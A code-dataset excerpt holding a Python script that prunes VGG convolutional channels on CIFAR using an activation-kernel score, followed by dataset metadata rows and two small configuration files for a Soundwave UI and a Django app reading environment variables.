== 0: pass else: idx0 = np.squeeze(np.argwhere(start_mask)) idx1 = np.squeeze(np.argwhere(end_mask)) if idx0.size == 1: idx0 = np.resize(idx0, (1,)) if idx1.size == 1: idx1 = np.resize(idx1, (1,)) w1 = m0.weight.data[:, idx0.tolist(), :, :].clone() w1 = w1[idx1.tolist(), :, :, :].clone() value.append(w1.clone()) parameter_buffer[key] = value elif isinstance(m0, nn.Linear): key = str(layer_id_in_cfg) + 'Linear' value = [] idx0 = np.squeeze(np.argwhere(start_mask)) if idx0.size == 1: idx0 = np.resize(idx0, (1,)) value.append(m0.weight.data[:, idx0].clone()) value.append(m0.bias.data.clone()) parameter_buffer[key] = value layer_id_in_cfg = 0 for m1 in newmodel.modules(): if isinstance(m1, nn.BatchNorm2d): key = str(layer_id_in_cfg) + 'BatchNorm' while len(parameter_buffer[key]) == 0: layer_id_in_cfg += 1 key = str(layer_id_in_cfg) + 'BatchNorm' m1.weight.data = parameter_buffer[key][0] m1.bias.data = parameter_buffer[key][1] m1.running_mean = parameter_buffer[key][2] m1.running_var = parameter_buffer[key][3] layer_id_in_cfg += 1 elif isinstance(m1, nn.Conv2d): key = str(layer_id_in_cfg) + 'Conv' while len(parameter_buffer[key]) == 0: layer_id_in_cfg += 1 key = str(layer_id_in_cfg) + 'Conv' m1.weight.data = parameter_buffer[key][0] elif isinstance(m1, nn.Linear): key = str(layer_id_in_cfg) + 'Linear' m1.weight.data = parameter_buffer[key][0] m1.bias.data = parameter_buffer[key][1] pass return newmodel def get_batch_jacobian(net, x, target, device): net.zero_grad() x.requires_grad_(True) y = net(x) y.backward(torch.ones_like(y)) jacob = x.grad.detach() return jacob, target.detach(), y.detach() def check_score(model, train_loader, sanity_check=False): newmodel = copy.deepcopy(model) reset_seed() newmodel.K = np.zeros((args.test_batch_size, args.test_batch_size)) def counting_forward_hook(module, inp, out): try: if not module.visited_backwards: return if isinstance(inp, tuple): inp = inp[0] inp = inp.view(inp.size(0), -1) x = (inp > 0).float() K = x @ x.t() K2 = (1. - x) @ (1. - x.t()) newmodel.K = newmodel.K + K.cpu().numpy() + K2.cpu().numpy() except: pass def counting_backward_hook(module, inp, out): module.visited_backwards = True for name, module in newmodel.named_modules(): if 'ReLU' in str(type(module)): # hooks[name] = module.register_forward_hook(counting_hook) module.register_forward_hook(counting_forward_hook) module.register_backward_hook(counting_backward_hook) newmodel = newmodel.to(device) s = [] for j in range(5): data_iterator = iter(train_loader) x, target = next(data_iterator) if sanity_check: x = shuffle_data(x) x2 = torch.clone(x) x2 = x2.to(device) x, target = x.to(device), target.to(device) jacobs, labels, y = get_batch_jacobian(newmodel, x, target, device) newmodel(x2.to(device)) s_, ld = np.linalg.slogdet(newmodel.K) s.append(ld) score = np.mean(s) return score def check_channel_score(model, train_loader, sanity_check=False): newmodel = copy.deepcopy(model) reset_seed() def counting_forward_hook(module, inp, out): try: # if not module.visited_backwards: # return if isinstance(inp, tuple): inp = inp[0] K_layer = np.zeros((args.test_batch_size, args.test_batch_size)) inp = inp.permute(1, 0, 2, 3) inp = inp.view(inp.size(0), inp.size(1), -1) inp = (inp > 0).float() score_list = [] for i in range(inp.size(0)): x = inp[i] K1 = x @ x.t() K2 = (1. - x) @ (1. - x.t()) K = K1.cpu().numpy() + K2.cpu().numpy() K_layer += K # s_, ld = np.linalg.slogdet(K) s_, ld = np.linalg.slogdet(K/inp.size(2)) score_list.append(ld) s_, ld = np.linalg.slogdet(K_layer/(inp.size(0)*inp.size(2))) # s_, ld = np.linalg.slogdet(K_layer) newmodel.layer_score.append(ld) newmodel.channel_score.append(score_list) except Exception as e: print(e) def counting_backward_hook(module, inp, out): module.visited_backwards = True def counting_backward_hook_ini(module, inp, out): newmodel.layer_score = [] newmodel.channel_score = [] for name, module in newmodel.named_modules(): if 'ReLU' in str(type(module)): # hooks[name] = module.register_forward_hook(counting_hook) module.register_forward_hook(counting_forward_hook) if name == 'feature.0': module.register_forward_hook(counting_backward_hook_ini) newmodel = newmodel.to(device) s = [] layer_s = [] for j in range(5): data_iterator = iter(train_loader) x, target = next(data_iterator) if sanity_check: x = shuffle_data(x) x2 = torch.clone(x) x2 = x2.to(device) x, target = x.to(device), target.to(device) # jacobs, labels, y = get_batch_jacobian(newmodel, x, target, device) newmodel(x2.to(device)) s.append(copy.deepcopy(newmodel.channel_score)) layer_s.append(copy.deepcopy(newmodel.layer_score)) layer_s = np.array(layer_s) layer_s = np.mean(layer_s, axis=0) channel_score = [] for channel in range(len(s[0])): tep = [] for j in range(len(s)): tep.append(s[j][channel]) tep = np.array(tep) tep = np.mean(tep, axis=0) channel_score.append(tep) # s = np.array(s).astype(float) # # s = np.mean(s, axis=0) # s = s.transpose() # tep = np.array(s[0]) return layer_s, channel_score def pruning(model): total = 0 cfg = [] cfg_mask = [] for m in model.modules(): if isinstance(m, nn.BatchNorm2d): total += m.weight.data.shape[0] bn = torch.zeros(total) index = 0 for m in model.modules(): if isinstance(m, nn.BatchNorm2d): size = m.weight.data.shape[0] bn[index:(index+size)] = m.weight.data.abs().clone() index += size y, i = torch.sort(bn) thre_index = int(total * args.percent) thre = y[thre_index] # print('Pruning threshold: {}'.format(thre)) mask = torch.zeros(total) index = 0 for k, m in enumerate(model.modules()): if isinstance(m, nn.BatchNorm2d): size = m.weight.data.numel() weight_copy = m.weight.data.abs().clone() _mask = weight_copy.gt(thre.cuda()).float().cuda() cfg_mask.append(_mask.clone()) if int(torch.sum(_mask)) > 0: cfg.append(int(torch.sum(_mask))) mask[index:(index+size)] = _mask.view(-1) # print('layer index: {:d} \t total channel: {:d} \t remaining channel: {:d}'.format(k, _mask.shape[0], int(torch.sum(_mask)))) index += size elif isinstance(m, nn.MaxPool2d): cfg.append('M') # print('Pre-processing Successful!') return mask, cfg, cfg_mask def create_cfg(cfg_mask_all, indicator): form = copy.deepcopy(cfg_mask_all) while 'M' in form: form.remove('M') # np.random.shuffle(mask_all) cfg_mask = [] end = 0 for i in form: cfg_mask.append(indicator[end:end + i]) end += i cfg = [] index = 0 for i in range(len(cfg_mask_all)): if cfg_mask_all[i] != 'M': if np.sum(cfg_mask[index]) != 0: cfg.append(int(np.sum(cfg_mask[index]))) index += 1 else: cfg.append('M') return cfg, cfg_mask def random_search(cfg_mask_all, percent): form = copy.deepcopy(cfg_mask_all) while 'M' in form: form.remove('M') total = np.sum(form) choose_num = int(total * percent) mask_all = np.append(np.ones(choose_num), np.zeros(total - choose_num)) record_dict = {} for i in range(len(mask_all)): record_dict[i] = [] score_test = 0 trail_index = 0 while score_test < 1450: for i in range(100): np.random.shuffle(mask_all) cfg, cfg_mask = create_cfg(cfg_mask_all, mask_all) model_new = create_model(model, cfg, cfg_mask) score = check_score(model_new, train_loader) for i in range(len(mask_all)): if not mask_all[i]: record_dict[i].append(score) average_score = pd.DataFrame([], columns=["position", "score"]) for i in range(len(mask_all)): info_dict = { 'position':i, 'score':np.max(record_dict[i]) } average_score = average_score.append(info_dict, ignore_index=True) average_score = average_score.sort_values(by=['score'], ascending=False) indexes = average_score['position'][0: int(len(average_score) * percent)] indexes = indexes.astype(int) indicator = np.ones(total) indicator[indexes] = 0 cfg, cfg_mask = create_cfg(cfg_mask_all, indicator) model_new = create_model(model, cfg, cfg_mask) score = check_score(model_new, train_loader) info_dict = { 'index': trail_index, 'cfg': cfg, 'cfg_mask': cfg_mask, 'score': score } wandb.log(info_dict) print('The trial of {}, the score is {:.2f}'.format(trail_index, score)) trail_index += 1 if score > score_test: score_test = score np.save('{:.2f}.npy'.format(score_test), info_dict) def reset_seed(seed=1): np.random.seed(seed) torch.manual_seed(seed) random.seed(seed) def count_channel(model): cfg_mask_all = [] for m in model.modules(): if isinstance(m, nn.BatchNorm2d): cfg_mask_all.append(m.weight.data.shape[0]) elif isinstance(m, nn.MaxPool2d): cfg_mask_all.append('M') form = copy.deepcopy(cfg_mask_all) while 'M' in cfg_mask_all: cfg_mask_all.remove('M') total = np.sum(cfg_mask_all) return total, form def shuffle_data(xs): Size = xs.size() # e.g. for CIFAR100, is 50000 * 32 * 32 * 3 xs = xs.reshape(Size[0], -1) for i in range(Size[0]): xs[i] = xs[i][torch.randperm(xs[i].nelement())] xs = xs.reshape(Size) return xs def greedy_search_new(model, percent, train_loader): buffer = 33 total, form = count_channel(model) channel_num = total progress_index = 0 indicator = np.ones(total) while channel_num > total * percent: # indicator = np.ones(total) score_dict = pd.DataFrame([], columns=['index', 'score']) for position in range(total): if indicator[position]: indicator_tep = copy.deepcopy(indicator) indicator_tep[position] = 0 cfg, cfg_mask = create_cfg(form, indicator_tep) model_new = create_model(model, cfg, cfg_mask) score = check_score(model_new, train_loader) info_dict = { 'index': position, 'score': score } score_dict = score_dict.append(info_dict, ignore_index=True) print('{}----{}/{}: score {:.2f}'.format(channel_num, position, total, score)) else: score = -1 info_dict = { 'index': position, 'score': -1, } score_dict = score_dict.append(info_dict, ignore_index=True) print('{}----{}/{}: score {:.2f}'.format(channel_num, position, total, score)) score_dict = score_dict.sort_values(by=['score'], ascending=False) indexes = score_dict['index'][0:buffer] indexes = indexes.astype(int) indicator[indexes] = 0 cfg, cfg_mask = create_cfg(form, indicator) channel_num = count_cfg_channel(cfg) newmodel = create_model(model, cfg, cfg_mask) score = check_score(newmodel, train_loader) info_dict = { 'index': progress_index*buffer, 'score': score } wandb.log(info_dict) progress_index += 1 # for i in range(len(cfg_mask)): # cfg = copy.copy(cfg_mask) # cfg[i] -= 1 # newmodel = models.__dict__[args.arch](dataset=args.dataset, cfg=cfg) # score = check_score(newmodel, train_loader) # score_dict[i] = score # print(score_dict) save_dict = { 'state_dict': newmodel.state_dict(), 'cfg': cfg, 'cfg_mask': cfg_mask, 'score': score } torch.save(save_dict, '{:.2f}.pth'.format(score)) # np.save('{:.2f}.npy'.format(score), save_dict) def channel_score_search(model, percent, train_loader): total, form = count_channel(model) indicator = np.ones(total) cfg, cfg_mask = create_cfg(form, indicator) new_model = copy.copy(model) for i in range(0, len(cfg_mask)): # score = check_score(new_model, train_loader) channel_score = check_channel_score(new_model, train_loader) channel_score = channel_score[i] channel_score_rank = copy.deepcopy(channel_score) channel_score_rank.sort() thre_index = int(len(channel_score)*percent) thre_score = channel_score_rank[thre_index-1] mask = [0 if j <= thre_score else 1 for j in channel_score] cfg_mask[i] = mask indicator_tep = [] for j in cfg_mask: indicator_tep += list(j) cfg_new, cfg_mask_new = create_cfg(form, indicator_tep) new_model = create_model(model, cfg_new, cfg_mask_new) score = check_score(new_model, train_loader) print(score) def rate_check(model, percent, train_loader): xshape = (1, 3, 32, 32) flops_original, param_original = get_model_infos(model, xshape) total, form = count_channel(model) indicator = np.ones(total) cfg, cfg_mask = create_cfg(form, indicator) f_list = [] p_list = [] for i in range(len(cfg_mask)): cfg_mask_new = copy.deepcopy(cfg_mask) cfg_mask_new[i][0:30] = 0 indicator_new = [] for one in cfg_mask_new: indicator_new += list(one) cfg_new, cfg_mask_new = create_cfg(form, indicator_new) model_new = create_model(model, cfg_new, cfg_mask_new) flops, param = get_model_infos(model_new, xshape) flops_rate = (flops_original-flops)/flops_original param_rate = (param_original-param)/param_original f_list.append(flops_rate) p_list.append(param_rate) print("") def channel_remove_check(model, train_loader, goal_f_rate, goal_p_rate): baseline_f_rate = 260292527 / 313772032 baseline_p_rate = 8300726 / 15299748 xshape = (1, 3, 32, 32) flops_original, param_original = get_model_infos(model, xshape) score = check_score(model, train_loader, True) score_layer_original, score_channel_original = check_channel_score(model, train_loader, True) total, form = count_channel(model) indicator = np.ones(total) cfg_original, cfg_mask_original = create_cfg(form, indicator) cfg_mask = copy.deepcopy(cfg_mask_original) model_new = copy.deepcopy(model) for i in range(len(cfg_mask_original)-1): score_layer, score_channel = check_channel_score(model_new, train_loader, True) cfg_mask[i] = score_channel[i] != -np.inf indicator = [] for one in cfg_mask: indicator += list(one) cfg, cfg_mask = create_cfg(form, indicator) model_new = create_model(model, cfg, cfg_mask) flops, param = get_model_infos(model_new, xshape) f_rate = flops / flops_original p_rate = param / param_original print(f_rate) index = 0 while f_rate > goal_f_rate: score_layer, score_channel = check_channel_score(model_new, train_loader) score_channel[-1] = np.ones(score_channel[-1].shape)*5000 indicator = [] for one in score_channel: indicator += list(one) min_index = indicator.index(min(indicator)) indicator = np.ones(len(indicator)) indicator[min_index] = 0 cfg, cfg_mask = create_cfg(cfg, indicator) model_new = create_model(model_new, cfg, cfg_mask) flops, param = get_model_infos(model_new, xshape) f_rate = flops / flops_original p_rate = param / param_original print(f_rate) info_dict = { "f_rate": f_rate, "p_rate": p_rate, "cfg": cfg, "index": index, } # wandb.log(info_dict) index += 1 score_prune = check_score(model_new, train_loader) torch.save(model_new, 'shuffle_channel_remove_n_f{:.4f}_p{:.4f}_{:.2f}.pth'.format(f_rate, p_rate, score_prune)) def ratio_cfg(form, ratio): output = [] for i in range(len(form)-1): if form[i] != 'M': form[i] = round(form[i]*ratio) return form def layer_wise_pruning(model, train_loader, pruning_rate): xshape = (1, 3, 32, 32) flops_original, param_original = get_model_infos(model, xshape) score = check_score(model, train_loader) score_layer_original, score_channel_original = check_channel_score(model, train_loader) total, form = count_channel(model) cfg_goal = ratio_cfg(copy.deepcopy(form), pruning_rate) # model_new = models.__dict__['vgg'](dataset='cifar100', cfg=cfg_goal) # flops, param = get_model_infos(model_new, xshape) # f_rate = flops / flops_original # p_rate = param / param_original # score = check_score(model_new, train_loader) while 'M' in cfg_goal: cfg_goal.remove('M') indicator = np.ones(total) cfg_original, cfg_mask_original = create_cfg(form, indicator) cfg_mask = copy.deepcopy(cfg_mask_original) model_new = copy.deepcopy(model) for i in range(len(cfg_mask_original)-1): score_layer, score_channel = check_channel_score(model_new, train_loader) pruning_num = np.sum(cfg_mask[i])-cfg_goal[i] ranked_score = copy.deepcopy(score_channel[i]) ranked_score.sort() thre_score = ranked_score[int(pruning_num)-1] if thre_score != -np.inf: cfg_mask[i] = score_channel[i] > thre_score else: tep = score_channel[i] == -np.inf index = np.where(tep == 1) index = np.random.choice(index[0], int(pruning_num), replace= False) tep = np.array(cfg_mask[i]) tep[index] = 0 cfg_mask[i] = list(tep) indicator = [] for one in cfg_mask: indicator += list(one) cfg, cfg_mask = create_cfg(form, indicator) model_new = create_model(model, cfg, cfg_mask) flops, param = get_model_infos(model_new, xshape) f_rate = flops / flops_original p_rate = param / param_original print(f_rate) # # index = 0 # while f_rate > goal_f_rate: # score_layer, score_channel = check_channel_score(model_new, train_loader) # score_channel[-1] = np.ones(score_channel[-1].shape)*5000 # indicator = [] # for one in score_channel: # indicator += list(one) # min_index = indicator.index(min(indicator)) # indicator = np.ones(len(indicator)) # indicator[min_index] = 0 # cfg, cfg_mask = create_cfg(cfg, indicator) # model_new = create_model(model_new, cfg, cfg_mask) # flops, param = get_model_infos(model_new, xshape) # f_rate = flops / flops_original # p_rate = param / param_original # print(f_rate) # info_dict = { # "f_rate": f_rate, # "p_rate": p_rate, # "cfg": cfg, # "index": index, # } # wandb.log(info_dict) # index += 1 score_prune = check_score(model_new, train_loader) torch.save(model_new, 'layer_wise_pruning_rate{}_f{:.4f}_p{:.4f}_{:.2f}.pth'.format(pruning_rate, f_rate, p_rate, score_prune)) def layer_remove_check(model, train_loader): baseline_f_rate = 260292527/313772032 baseline_p_rate = 8300726/15299748 xshape = (1, 3, 32, 32) flops_original, param_original = get_model_infos(model, xshape) score = check_score(model, train_loader) score_layer_original, score_channel_original = check_channel_score(model, train_loader) total, form = count_channel(model) indicator = np.ones(total) cfg, cfg_mask = create_cfg(form, indicator) # cut_list = [11,10,8,7,4,5,2,0] cut_list_all = [10, 0, 11, 7, 8, 2, 4, 5] cut_list = cut_list_all[:1] for one in cut_list: cfg_mask[one] = np.zeros(len(cfg_mask[one])) # cfg_mask[4] = np.zeros(len(cfg_mask[4])) indicator_new = [] for one in cfg_mask: indicator_new += list(one) cfg_new, cfg_mask_new = create_cfg(form, indicator_new) model_new = create_model(model, cfg_new, cfg_mask_new) flops, param = get_model_infos(model_new, xshape) score_prune = check_score(model_new, train_loader) f_rate = flops/flops_original p_rate = param/param_original score_layer, score_channel = check_channel_score(model_new, train_loader) # for one in score_channel: # print(np.sum(one == -np.inf), len(one)) # # save_dict = { # 'state_dict': model_new.state_dict(), # 'cfg': cfg_new, # 'cfg_mask': cfg_mask_new, # 'score': score_prune # } # torch.save(model_new, '{:.2f}.pth'.format(score_prune)) # model_new = models.__dict__[args.arch](dataset=args.dataset, cfg = cfg_new) # score_prune = check_score(model_new, train_loader) # score_layer, score_channel = check_channel_score(model_new, train_loader) torch.save(model_new, '{}-{:.2f}.pth'.format(len(cut_list),score_prune)) print("") # f_list = [] # p_list = [] # # for i in range(len(cfg_mask)): # cfg_mask_new = copy.deepcopy(cfg_mask) # cfg_mask_new[i][0:30] = 0 # indicator_new = [] # for one in cfg_mask_new: # indicator_new += list(one) # cfg_new, cfg_mask_new = create_cfg(form, indicator_new) # model_new = create_model(model, cfg_new, cfg_mask_new) # flops, param = get_model_infos(model_new, xshape) # flops_rate = (flops_original-flops)/flops_original # param_rate = (param_original-param)/param_original # f_list.append(flops_rate) # p_list.append(param_rate) def count_cfg_channel(cfg): form = copy.deepcopy(cfg) while 'M' in form: form.remove('M') channel = np.sum(form) return channel def create_base(model, train_loader): total, form = count_channel(model) indicator = [] for one in form: if one != 'M': tep = np.zeros(one) tep[0] = 1 indicator.append(tep) for i in range(len(indicator)): record = pd.DataFrame([], columns=["index", "score"]) for j in range(len(indicator[i])): tep = np.zeros(len(indicator[i])) tep[j] = 1 indicator_tep = copy.deepcopy(indicator) indicator_tep[i] = tep indicator_list = [] for k in indicator_tep: indicator_list += list(k) indicator_tep = np.array(indicator_list).astype(int) cfg, cfg_mask = create_cfg(form, indicator_tep) new_model = create_model(model, cfg, cfg_mask) score = check_score(new_model, train_loader) info_dict = { "index": j, "score": score } record = record.append(info_dict, ignore_index=True) # print("for the {}-th module, tried {}/{}, the score is {:.2f}".format(i, j, len(indicator[i]), score)) record = record.sort_values(by=['score'], ascending=False) indexes = record['index'][0] tep = np.zeros(len(indicator[i])) tep[int(indexes)] = 1 indicator[i] = tep print("for the {}-th module, tried {}/{}, the score is {:.2f}".format(i, j, len(indicator[i]), record['score'][0])) indicator_list = [] for i in indicator: indicator_list += (list(i)) indicator = np.array(indicator_list) return indicator def greedy_search_increase(model, percent, train_loader): buffer = 11 total, form = count_channel(model) indicator = create_base(model, train_loader) left_channels = int(total*percent - np.sum(indicator)) while left_channels > 0: record = pd.DataFrame([], columns=["index", "score"]) for i in range(len(indicator)): if indicator[i]: print("already chosen") else: indicator_tep = copy.deepcopy(indicator) cfg, cfg_mask = create_cfg(form, indicator_tep) new_model = create_model(model, cfg, cfg_mask) score = check_score(new_model, train_loader) info_dict = { "index": i, "score": score } record = record.append(info_dict, ignore_index=True) record = record.sort_values(by=['score'], ascending=False) if left_channels < buffer: buffer = left_channels indexes = record['index'][0:buffer] indexes = indexes.astype(int) indicator[indexes] = 1 cfg, cfg_mask = create_cfg(form, indicator) new_model = create_model(model, cfg, cfg_mask) score = check_score(new_model, train_loader) left_channels = int(total * percent - np.sum(indicator)) print("Still have {} channels to prune, now the highest score is {:.2f}".format(left_channels, score)) info_dict = { "channels": np.sum(indicator), "score": score } wandb.log(info_dict) save_dict = { 'state_dict': new_model.state_dict(), 'cfg': cfg, 'cfg_mask': cfg_mask, 'score': score } torch.save(save_dict, '{:.2f}.pth'.format(score)) def greedy_search(model, percent, train_loader): total, form = count_channel(model) index_trial = 0 while count_cfg_channel(form) > total*percent: score_list = [] for i in range(len(form)): if form[i] != 'M': cfg = copy.deepcopy(form) cfg[i] -= 1 newmodel = models.__dict__[args.arch](dataset=args.dataset, cfg = cfg) score = check_score(newmodel, train_loader) score_list.append(score) else: score_list.append(-1) max_score = max(score_list) index = score_list.index(max_score) info_dict = { 'index': index_trial, 'cfg': form, 'score': max_score } index_trial +=1 wandb.log(info_dict) form[index] -= 1 print(max_score) info_dict = { 'cfg': form, 'score': max_score } np.save('{:.2f}.npy'.format(score), info_dict) # cfg_mask_all = [] # for m in model.modules(): # if isinstance(m, nn.BatchNorm2d): # cfg_mask_all.append(m.weight.data.shape[0]) # elif isinstance(m, nn.MaxPool2d): # cfg_mask_all.append('M') # # form = copy.deepcopy(cfg_mask_all) # while 'M' in form: # form.remove('M') # total = np.sum(form) # indicator = np.ones(total) # cfg_mask = [] # end = 0 # for i in form: # cfg_mask.append(indicator[end:end + i]) # end += i # bn = torch.zeros(total) # cfg = [] # index = 0 # for i in range(len(cfg_mask_all)): # if cfg_mask_all[i] != 'M': # cfg.append(int(np.sum(cfg_mask[index]))) # index += 1 # else: # cfg.append('M') # model_new = create_model(model, cfg, cfg_mask) # score = check_score(model_new, train_loader) # score_dict = pd.DataFrame([], columns=['index', 'score']) # score_dict.to_csv('score_indicator.csv') # score_dict = score_dict.sort_values(by=['score'], ascending=False) # indexes = score_dict['index'][0: int(len(score_dict)*percent)] # indexes = indexes.astype(int) # indicator_tep = copy.deepcopy(indicator) # indicator_tep[indexes] = 0 # cfg_mask = [] # end = 0 # for i in form: # cfg_mask.append(indicator_tep[end:end + i]) # end += i # cfg = [] # index = 0 # for i in range(len(cfg_mask_all)): # if cfg_mask_all[i] != 'M': # cfg.append(int(np.sum(cfg_mask[index]))) # index += 1 # else: # cfg.append('M') # model_new = create_model(model, cfg, cfg_mask) # score = check_score(model_new, train_loader) # info_dict = { # 'cfg': cfg, # 'cfg_mask': cfg_mask, # 'score': score # } # np.save('{:.2f}.npy'.format(score), info_dict) if __name__ == '__main__': parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune') parser.add_argument('--dataset', type=str, default='cifar100', help='training dataset (default: cifar10)') parser.add_argument('--test-batch-size', type=int, default=128, metavar='N', help='input batch size for testing (default: 256)') parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA training') parser.add_argument('--depth', type=int, default=16, help='depth of the vgg') parser.add_argument('--percent', type=float, default=0.5, help='scale sparse rate (default: 0.5)') parser.add_argument('--model', default='', type=str, metavar='PATH', help='path to the model (default: none)') parser.add_argument('--save', default='./baseline/vgg16-cifar100', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('--save_1', default='./baseline/vgg16-cifar100', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('--start_epoch', default=1, type=int, metavar='N', help='manual start epoch number') parser.add_argument('--end_epoch', default=160, type=int, metavar='N', help='manual end epoch number') # quantized parameters parser.add_argument('--bits_A', default=8, type=int, help='input quantization bits') parser.add_argument('--bits_W', default=8, type=int, help='weight quantization bits') parser.add_argument('--bits_G', default=8, type=int, help='gradient quantization bits') parser.add_argument('--bits_E', default=8, type=int, help='error quantization bits') parser.add_argument('--bits_R', default=16, type=int, help='rand number quantization bits') parser.add_argument('--arch', default='vgg', type=str, help='architecture to use') # multi-gpus parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() seed = 1 random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) if not os.path.exists(args.save): os.makedirs(args.save) gpu = args.gpu_ids gpu_ids = args.gpu_ids.split(',') args.gpu_ids = [] for gpu_id in gpu_ids: id = int(gpu_id) if id > 0: args.gpu_ids.append(id) if len(args.gpu_ids) > 0: torch.cuda.set_device(args.gpu_ids[0]) device = torch.device("cuda" if torch.cuda.is_available() else "cpu") if args.arch.endswith('lp'): # model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth) model = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth) elif args.dataset == 'imagenet': model = models.__dict__[args.arch](pretrained=False) if len(args.gpu_ids) > 1: model = torch.nn.DataParallel(model, device_ids=args.gpu_ids) else: model = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth) if args.dataset == 'cifar10': train_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data.cifar10', train=True, download=True, transform=transforms.Compose([ transforms.Pad(4), transforms.RandomCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data.cifar10', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) else: train_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=True, download=True, transform=transforms.Compose([ transforms.Pad(4), transforms.RandomCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) if args.cuda: model.cuda() wandb_project = 'pruning_score' name = 'with_out_normalization_60' # wandb.init(project=wandb_project, name=name) # # random_search(cfg_mask_all, args.percent) # channel_score_search(model, args.percent, train_loader) # greedy_search(model, args.percent, train_loader) # layer_remove_check(model, train_loader) # rate_check(model, args.percent, train_loader) channel_remove_check(model, train_loader, 0.61, 0.2) # layer_wise_pruning(model, train_loader, 0.8) # # data = np.load('1633.66.npy', allow_pickle=True) # data = data.item() # cfg = data['cfg'] # cfg_mask = data['mask_cfg'] # for i in range(len(cfg_mask)): # cfg_mask[i] = np.asarray(cfg_mask[i].cpu().numpy()) # score = check_score(model, cfg, cfg_mask) # print(score)
33,255
0
483
6716a726078f16e1423a1e22103925e9d6218fcc
234
py
Python
ui/config.py
fakeNetflix/pinterest-repo-soundwave
189b30708502cb6b76cd7a895bbd4389b0142e2f
[ "Apache-2.0" ]
104
2017-05-14T23:28:10.000Z
2021-04-25T11:20:19.000Z
ui/config.py
fakeNetflix/pinterest-repo-soundwave
189b30708502cb6b76cd7a895bbd4389b0142e2f
[ "Apache-2.0" ]
17
2020-03-04T23:22:31.000Z
2021-12-09T21:31:06.000Z
ui/config.py
fakeNetflix/pinterest-repo-soundwave
189b30708502cb6b76cd7a895bbd4389b0142e2f
[ "Apache-2.0" ]
18
2017-05-16T22:40:24.000Z
2022-02-21T15:35:20.000Z
"""Config data for cmdb UI.""" SOUNDWAVE_API = "http://soundwave-api/v2/" SOUNDWAVE_HOST = "0.0.0.0" SOUNDWAVE_PORT = 80 SOUNDWAVE_LOG_PATH = "/var/log/soundwave_ui/" SOUNDWAVE_ACCESS_LOG = "access.log" SOUNDWAVE_APP_LOG = "info.log"
29.25
45
0.739316
"""Config data for cmdb UI.""" SOUNDWAVE_API = "http://soundwave-api/v2/" SOUNDWAVE_HOST = "0.0.0.0" SOUNDWAVE_PORT = 80 SOUNDWAVE_LOG_PATH = "/var/log/soundwave_ui/" SOUNDWAVE_ACCESS_LOG = "access.log" SOUNDWAVE_APP_LOG = "info.log"
0
0
0
f6ca7e10f361d5fba876d39453a170a545ad8aea
786
py
Python
config/env_variables.py
Calpax-aaS/web-app
155a40a51b27f9741c137dcf144daabcb09d39ed
[ "BSD-3-Clause" ]
null
null
null
config/env_variables.py
Calpax-aaS/web-app
155a40a51b27f9741c137dcf144daabcb09d39ed
[ "BSD-3-Clause" ]
2
2021-06-09T18:48:49.000Z
2021-09-22T19:55:17.000Z
config/env_variables.py
Calpax-aaS/web-app
155a40a51b27f9741c137dcf144daabcb09d39ed
[ "BSD-3-Clause" ]
1
2022-03-02T20:55:50.000Z
2022-03-02T20:55:50.000Z
import os django_secret = os.getenv('DJANGO_SECRET_KEY', 'l0cAl-t3st*') django_is_debug_activated = os.getenv('DJANGO_DEBUG', 'False').lower() == 'true' django_relative_path_for_static_file = os.getenv('DJANGO_STATIC_PATH', './public/static') auth0_client_id = os.getenv('AUTH0_CLIENT_ID') auth0_client_secret = os.getenv('AUTH0_CLIENT_SECRET') # POSTGRESQL_ADDON -> env variables in CleverCloud database = { 'name': os.getenv('POSTGRESQL_ADDON_DB', os.getenv('PG_DB', '')), 'user': os.getenv('POSTGRESQL_ADDON_USER', os.getenv('PG_USER', '')), 'password': os.getenv('POSTGRESQL_ADDON_PASSWORD', os.getenv('PG_PWD', '')), 'host': os.getenv('POSTGRESQL_ADDON_HOST', os.getenv('PG_HOST', '')), 'port': os.getenv('POSTGRESQL_ADDON_PORT', os.getenv('PG_PORT', '')), }
46.235294
89
0.717557
import os django_secret = os.getenv('DJANGO_SECRET_KEY', 'l0cAl-t3st*') django_is_debug_activated = os.getenv('DJANGO_DEBUG', 'False').lower() == 'true' django_relative_path_for_static_file = os.getenv('DJANGO_STATIC_PATH', './public/static') auth0_client_id = os.getenv('AUTH0_CLIENT_ID') auth0_client_secret = os.getenv('AUTH0_CLIENT_SECRET') # POSTGRESQL_ADDON -> env variables in CleverCloud database = { 'name': os.getenv('POSTGRESQL_ADDON_DB', os.getenv('PG_DB', '')), 'user': os.getenv('POSTGRESQL_ADDON_USER', os.getenv('PG_USER', '')), 'password': os.getenv('POSTGRESQL_ADDON_PASSWORD', os.getenv('PG_PWD', '')), 'host': os.getenv('POSTGRESQL_ADDON_HOST', os.getenv('PG_HOST', '')), 'port': os.getenv('POSTGRESQL_ADDON_PORT', os.getenv('PG_PORT', '')), }
0
0
0
2c6268758b8e73bd29f7948fb2074d858df22206
10,073
py
Python
cpdb/twitterbot/tests/test_response_builders.py
